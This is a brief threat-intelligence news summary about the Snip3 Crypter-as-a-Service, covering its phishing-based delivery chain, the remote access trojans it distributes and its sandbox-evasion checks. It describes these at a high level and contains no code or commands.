A highly sophisticated Crypter-as-a-Service (CaaS) has been discovered delivering various RAT families onto targeted systems. Researchers from Morphisec named this service Snip3 based on the common denominator username discovered inside the PDB indicator of an earlier variant.
What has happened?
Although Snip3 Crypter's activity was first observed in the wild on February 4, it is still ongoing. Additionally, related variants are evasive in nature and only a few security solutions have been able to detect them.
- The Crypter spread via phishing emails that lead to the download of a VB file or script. In some instances, the attacks start with a large install file, such as an Adobe installer, bundling the next stage.
- The VB script is developed for loading and moving execution to the second-stage PowerShell script.
- There are four versions including 11 sub-versions in this initial loader stage. These four versions have a second-stage PowerShell loading mechanism. The main difference between these 11 sub-versions is the type of obfuscation each version uses.
- The four PowerShell scripts deliver several RATs such as AsyncRAT 0.5.7B, RevengeRAT, and Agent Tesla.
Advanced techniques to bypass detection
Snip3 uses multiple advanced techniques to bypass detection that makes this service more lethal.
- It executes PowerShell code with the ‘remotesigned’ parameter and uses services such as Pastebin and top4top for staging, and compiles the RunPE loaders on the endpoint in runtime.
- In addition, the crypter service validates the existence of VMWare virtualization and Windows Sandbox to dodge detection via sandbox analysis.
Conclusion
Snip3 has the ability to distinguish sandboxing and virtual environments, making it capable of bypassing detection-centric solutions. Organizations need to make sure that their detection-focused stacks are aware of attacks employing the Snip3 Crypter service and similar ones.
Publisher
/https://cyware-ent.s3.amazonaws.com/image_bank/shutterstock_166214930.jpg)
/https://cyware-ent.s3.amazonaws.com/image_bank/shutterstock_254344498.jpg)
